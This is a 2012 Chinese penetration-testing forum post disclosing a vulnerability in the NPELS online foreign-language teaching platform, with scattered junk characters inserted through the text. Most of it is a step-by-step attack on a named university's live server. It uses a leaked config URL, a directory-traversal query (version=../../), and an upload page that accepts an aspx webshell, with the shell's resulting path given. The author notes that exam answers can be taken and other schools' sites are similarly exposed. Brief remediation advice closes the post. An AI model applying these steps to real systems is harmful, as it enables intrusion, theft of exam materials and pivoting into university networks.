中国网络渗透测试联盟

标题: 新理念外语网络教学平台文件上传漏洞 [打印本页]

---

作者: admin    时间: 2012-12-4 11:10
标题: 新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
# @* U7 r+ g6 {0 g
, ]- \+ J8 V9 X详细说明：
" x* j# r, Y% v' X
以南开大学的为例:
http://222.30.60.3/NPELS
5 Z" q' ^. V1 J) dNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
及版本号
4 |: ~, c- S& c3 T<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
; {6 D9 g, D. r1 rhttp://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
) X+ {- F" ^, |* |( U* w& X7 Vhttp://222.30.60.3/NPELS/CommonS ... List?version=../../

3 p; o6 _- X7 \发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可
+ [7 J' ~3 P; C8 V1 D
% w  v4 y+ r" F5 q" O0 a7 FOOXX
) I7 J  b. b# S7 _$ D& v) Y
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：

+ z5 R. J- s; x# Y9 {; e& y; L列目录：
3 k# u  R3 _. X1 {http://222.30.60.3/NPELS/CommonS ... List?version=../../
5 V8 x  O1 e% T+ x% p* C4 J( _文件上传：
, g. o( g' L/ A+ i' Dhttp://222.30.60.3/npelsv/editor/editor.htm
- Z- j8 j7 |9 |$ n
/ @' g. O: j0 ~- a8 t) l/ ~上传木马：
5 ~" `0 Q# Y9 ~) x* lhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

修复方案：
好像考试系统必须使用 CommonService.asmx
: K, V; d1 |0 B" [  |最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
- P6 a( }# P  T  j4 m# C$ N/ k' A

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2